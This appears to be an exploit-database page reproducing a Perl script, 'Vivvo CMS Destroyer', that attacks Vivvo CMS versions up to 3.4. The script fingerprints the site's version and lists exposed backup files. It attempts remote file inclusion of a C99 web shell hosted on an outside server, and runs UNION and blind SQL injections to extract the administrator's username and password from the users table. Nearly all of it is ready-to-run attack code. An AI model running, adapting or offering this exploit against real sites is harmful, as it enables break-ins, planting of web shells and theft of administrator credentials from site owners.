SecurityReason - Vivvo CMS <= 3.4 Multiple Vulnerabilities Destroyer Exploit ( Exploit )

Exploit Code :

#!/usr/bin/perl

#Vivvo CMS Destroyer
#uxmal666@gmail.com
#By Xianur0
#-------------CREDITS-------------
#-------------/CREDITS-------------

print "\n Vivvo CMS Destroyer By Xianur0\n";

#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17)
Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->new(GET => $path."/feed.php?output_type=rss");
$req->header('Accept' => 'text/javascript, text/html, application/xml,
text/xml, */*');
$res = $ua->request($req);
if ($res->is_success && $res->content =~ "generator") {
&parser($res->content);
} else {
$req = HTTP::Request->new(GET => $path."/index.php?feed");
$req->header('Accept' => 'text/javascript, text/html, application/xml,
text/xml, */*');
$res = $ua->request($req);
if ($res->is_success && $res->content =~ "generator") {
&parser($res->content);
}
else { print "\nError getting data!\n"; exit;}
}

&backups;

sub parser {
my @datos = split('<generator>Vivvo CMS ', $_[0]);
my @version = split('</generator>', $datos[1]);
$version = $version[0];
if($version[0] == "") {
my @datos = split('<meta name="generator" content="Vivvo ', $_[0]);
my @version = split('" />', $datos[1]);
$version = $version[0];
}
print "Version: ".$version."\n";
if($version < "4") { print "Outdated version of Vivvo CMS!\n";
&desactualizada($version);}
}

sub backups {
$req = HTTP::Request->new(GET => "$path/backup");
$req->header('Accept' => 'text/xml');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ "<title>Index of /backup</title>") {
print "\n Backups:\n";
my @datos = split('<a href="', $res->content);
$datos[0] = "";
foreach $archivos (@datos) {
my @archivo = split('">', $archivos);
if($archivo[0] !~ /\?/){print $archivo[0]."\n"; }
}
print "\nUnprotected Directory: $path/backup\n";
}
}
}

sub rfi {
$vuln = $_[0];
$req = HTTP::Request->new(GET => "$path/$vuln=$SHELL?");
$req->header('Accept' => 'text/xml');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ $textshell) {
print "RFI Detected!: $path/$vuln=$SHELL?";
}
}}

sub sql {
$exploit =
"pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,1
0,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20use
rid=1";
$req = HTTP::Request->new(GET => "$path/$exploit");
$req->header('Accept' => 'text/xml');
$res = $ua->request($req);
if ($res->is_success) {
print "SQL Injection Generated: $path$exploit";
}
}

sub blind {
for($i=1; $i<32;$i++) {
for($o=30; $o<102;$o++) {
$injection =
"$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/*
*/FROM/**/tblUsers/**/WHERE/**/userid=1),".$i.",1))=".$o;
$req = HTTP::Request->new(GET => $injection);
$req->header('Accept' => 'text/xml');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content != "") {
print "Blind Done Correctly!: $injection";
}
}
}}}

sub desactualizada {
$version = $_[0];
switch ($version) {
case "3.4" { print "Blind SQL Injection trying ....\n"; &blind;
print "Intentando RFI....\n"; &rfi('include/db_conn.php?root');}
case "3.2" { print "RFI trying ....\n";
&rfi('index.php?classified_path'); print "SQL Injection....\n"; &sql;}
else { print "There is no registration for this Exploit Version! :
(\n";}
}
}